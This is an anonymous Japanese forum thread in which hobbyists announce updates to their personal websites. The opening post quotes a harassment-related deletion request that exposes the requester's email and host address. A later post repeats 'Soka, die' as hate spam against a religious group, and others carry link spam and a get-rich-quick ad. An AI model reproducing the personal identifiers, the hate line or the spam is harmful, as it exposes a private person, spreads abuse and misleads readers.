351 名前:Name_Not_Found[age] 投稿日:2006/08/27(日) 15:16:23 ID:???
hp:Web制作管理[重要削除]
http://qb5.2ch.net/test/read.cgi/saku2ch/1040109260/120

120 名前:ハダ[nagao-sw-oua@hotmail.co.jp] 投稿日:06/08/27 14:59 HOST:79.58.111.219.dy.bbexcite.jp
対象区分:[個人・三種]優先削除あり
削除対象アドレス:
http://pc8.2ch.net/test/read.cgi/hp/1144192292/16
http://pc8.2ch.net/test/read.cgi/hp/1144192292/17
http://pc8.2ch.net/test/read.cgi/hp/1144192292/261
http://pc8.2ch.net/test/read.cgi/hp/1144192292/264
http://pc8.2ch.net/test/read.cgi/hp/1144192292/348
http://pc8.2ch.net/test/read.cgi/hp/1023935314/691
http://pc8.2ch.net/test/read.cgi/hp/1144192292/227
削除理由・詳細・その他:
削除依頼よろしくお願い致します。

対象アドレスにて、私の経歴と思われるwikiへの投稿(こちらは既に削除済み)へ
執拗なURLが貼られており、私の個人名、経歴などが晒されている他、
いかにも私本人がwikiへ投稿したとする誹謗中傷が相次いでいます。
また、私のみではなく、私の家族の写真、本名などが多く書き込まれ、
精神的な苦痛を感じております。
現在警察へは被害届けを提出しておりますが、こちらの対象アドレスを
削除していただかなければ根本的な解決になりません。
0497Name_Not_Found
垢版 |
2007/07/20(金) 22:44:43ID:J4AVcPqQ
一ヶ月ぶりに更新
0498Name_Not_Found
垢版 |
2007/08/04(土) 18:48:05ID:PsdVsCtF
徹夜のテンションで新しい素材いっぱいうp
0499Name_Not_Found
垢版 |
2007/08/05(日) 02:18:03ID:???
童貞の彼氏を筆下ろししてからもう2週間
サイト更新もしたのに連絡がとれません

この遅漏野朗が
0501Name_Not_Found
垢版 |
2007/08/06(月) 06:23:13ID:???
朝早く起きて更新終わった

仕事だるい
0503Name_Not_Found
垢版 |
2008/01/02(水) 23:37:45ID:IicEEDR8
新年だからTOPに正月絵を貼った
0504Name_Not_Found
垢版 |
2008/03/19(水) 01:56:55ID:2w6uKU5W
更新しますた
0505Name_Not_Found
垢版 |
2008/04/14(月) 14:25:34ID:y+Cg1dNr
(・∀・)ブイブイ!!
0507Name_Not_Found
垢版 |
2009/03/19(木) 06:51:00ID:mJeh3kj4
約一年ぶりか
ここも過剃ったな
0508Name_Not_Found
垢版 |
2010/10/05(火) 02:44:58ID:VYjiAMkT
iswebからland.toへ移転更新あげ
0511Name_Not_Found
垢版 |
2010/11/23(火) 14:53:51ID:7L4hOFcq
いまさ自社サイト
全面作り変えしてる
ほら 俺ってプロじゃん
意地にかけてもヘタレなデザインなんてできないから
もうさ 必死だわ
CMSにパートでFlash使ってる
とりあえずさっき1枚あげた
 
0515Name_Not_Found
垢版 |
2011/03/12(土) 17:36:12.74ID:eGaLi2Ak
アゲ
0516Name_Not_Found
垢版 |
2011/06/16(木) 22:45:02.23ID:rO6MiPNX
約半年振りに更新。

同人板にあったスレはもう無いのか。
こっちも過疎ってるけど。
0519Name_Not_Found
垢版 |
2012/09/15(土) 22:51:06.63ID:???
創価死ね 
創価死ね
創価死ね
創価死ね 
創価死ね
創価死ね
創価死ね
創価死ね
創価死ね
創価死ね
創価死ね
創価死ね
創価死ね 
創価死ね
創価死ね
創価死ね 
創価死ね
創価死ね 
創価死ね
創価死ね
創価死ね
0520Name_Not_Found
垢版 |
2012/09/16(日) 12:03:54.19ID:???
↑こんな過疎スレまでご苦労なこって。
0521Name_Not_Found
垢版 |
2012/11/26(月) 17:49:09.48ID:0XvtI1sj
更新したのでageてみる。
0522Name_Not_Found
垢版 |
2013/02/21(木) 19:38:53.24ID:hNJhitgn
今日は更新したぞ
0523不夜城@勝〓橋 ◆72pu09bxDc
垢版 |
2013/02/24(日) 18:33:19.50ID:ZLkK7HB9
更新〜。
0524Name_Not_Found
垢版 |
2013/04/08(月) 02:33:55.27ID:EkMbCnGW
更新している時に限って人が来ないんだよな…なんでだ
してない時は来るのに
0525Name_Not_Found
垢版 |
2013/04/08(月) 09:02:00.54ID:Tq0+U+ET
ブログ更新はダメなの?だったら毎日あげるよ
0527Name_Not_Found
垢版 |
2014/05/21(水) 20:21:41.87ID:???
ラーメン二郎
お腹が空いたときはラーメン二郎、というコースが
学生の頃から決まっています。
そんなにスープが濃厚というわけではないのですが、
無料トッピングのカラメやアブラを加えると、
かなり味に深みが出てきます。

最近はあらゆるお店でラーメン二郎のインスパイア系のラーメンが
増えてきていて、ラーメン二郎の欠点であったスープの薄さを
克服したお店があって、探すのが楽しいです。

二郎の楽しみはブタにあります。
チャーシューは普通薄めに切られた焼き豚という
ものが多いのですが、二郎のブタは
かなり分厚く、味がかなりしみこんでいるのが特徴です。

ブタラーメンという名前で出されているのが多いと思いますが、
このチャーシューがたっぷりと入ったラーメンが
どっさりの野菜と一緒になることで二郎らしさが出てきます。
http://blog.cnfol.com/atonokari/article/1400070439-92923824.html
0529Name_Not_Found
垢版 |
2018/05/01(火) 19:48:47.92ID:l1wYHpV1
誰でもできる在宅ワーク儲かる方法
少しでも多くの方の役に立ちたいです
グーグルで検索するといいかも『金持ちになりたい 鎌野介メソッド』

CCQ3D
0530Name_Not_Found
垢版 |
2019/11/18(月) 23:39:06.97ID:jwGYsNgF
あげ
0532Name_Not_Found
垢版 |
2023/03/06(月) 13:39:58.92ID:???
上の部屋のやつがドンドンうるさく、イラッとしたけど、よく考えると、ここ最上階でメチャ怖い。とりあえず、アーメン。
0533Name_Not_Found
垢版 |
2023/09/16(土) 03:19:26.69ID:???
ホンマに、そないなるんやなぁ
レスを投稿する


ニューススポーツなんでも実況